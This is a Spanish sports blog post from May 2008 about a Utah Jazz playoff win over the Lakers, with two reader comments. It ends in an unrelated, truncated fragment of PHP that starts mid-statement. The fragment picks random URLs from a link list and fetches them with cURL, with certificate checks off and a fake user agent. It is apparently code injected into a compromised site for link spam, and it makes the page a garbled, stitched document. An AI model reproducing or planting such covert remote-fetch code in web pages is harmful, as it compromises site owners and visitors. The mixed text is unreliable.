BEAT(-ED) LA!!!

11 de May de 2008 por TheDeerHunter

BEAT(-ED) L.A.!!! (LAL 99 – UTA 104)

Utah logró porfín batir a Lakers anoche, como no podía ser de otra forma, en su bastión de Salt Lake City. Parece que se había olvidado lo peligroso que es este equipo en su cancha y ya se especulaba con otra victoria “fácil” en 4 o 5 partidos. Hasta los propios pupilos de Phil Jackson se vieron obligados a salir a la palestra para tratar de calmar el frenesí popular. Y es que hay que ser conscientes de que no es casualidad que todavía no se haya producido una sóla victoria visitante en esta segunda ronda como tampoco lo es el balance arrollador de los Jazz en el Energy Solutions.

Mucho se ha hablado de que Stern sueña con esa final Celtics – Lakers y seguramente así será, no lo podemos saber. Pero lo que sí está claro es que anoche Utah apretó mucho más en defensa si cabe que los pasados días pero, a cambio fue sancionado con el menor número de faltas de la serie. En todos los lados cuecen habas, aquí y en USA, y los jugadores no se hacen más altos y más guapos por jugar en su pabellón… la ventaja está más en otra dirección, como os podéis imaginar.

El caso es que, el día que Lakers lograron equilibrar el rebote, los Jazz con ese “extra de energía” lograron provocar nada menos que 18 pérdidas, 10 de ellas en la primera mitad, precísamente cuando, con eléctricos contraataques llevados magistralmente por Deron, lograron la ventaja que no perderían ya. Hay que destacar a Gasol en este apartado, las pérdidas de balón son uno de sus mayores defectos y anoche estuvo especialmente torpe, acaparando más de la cuarta parte de todas ellas, si bien en alguna Utah se permitieron estirar los limites del reglamento sin ningún problema.

El caso es que, Boozer, esta vez sin problemas de faltas, hizo un partido memorable a la altura de aquel al que llamaban “El Cartero” haciendo recordar los momentos mágicos que se vivieron hace ya casi una década en esta difícil cancha. Aportó anoche más que en los otros dos partidos juntos y se conjuró con Williams y Okur para comerse con patatas los hasta ahora invencibles Lakers.

Prácticamente así lo hicieron. Ningún jugador amarillo anotó más de 13 puntos excepto uno. El problema es que ese uno se llama Kobe Bryant y no suele ser de los que dan fácilmente su brazo a torcer. Kobe se cargó el equipo a la espalda y peleó lo indecible por lograr la victoria. Podríamos decir que tuvo en sus manos sentenciar la serie, pero no se puede ganar siempre, menos contra un grandísimo equipo como lo es Utah.

Comenta

2 comentarios a esta entrada

  1. Gallis dice:
    #1

    Sinceramente, me cuesta creer que alguien pensara seriamente que los Lakers iban a ganar fácil esta serie…y eso que yo no descarto en absoluto ganar el cuarto partido…pero eso no garantiza ni ganar el quinto ni que, en caso de hacerlo, sea fácil…

      Citar

  2. Red dice:
    #2

    Mal me pese, lamentable partido de Pau, típico de un Cancer, obcecándose contra la fatalidad, en vez de luchar contra ella… Y Utah maniatándole totalmente en defensa… Eso si, me gusta que aunque lo Jazz les barrieran en estado de ánimo, aun tuvieron opcione en el último minuto, lástima de la pedrá de Kobe y la empanada de Walton (brillante en otros momentos) Saludos, Ira’s fans…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>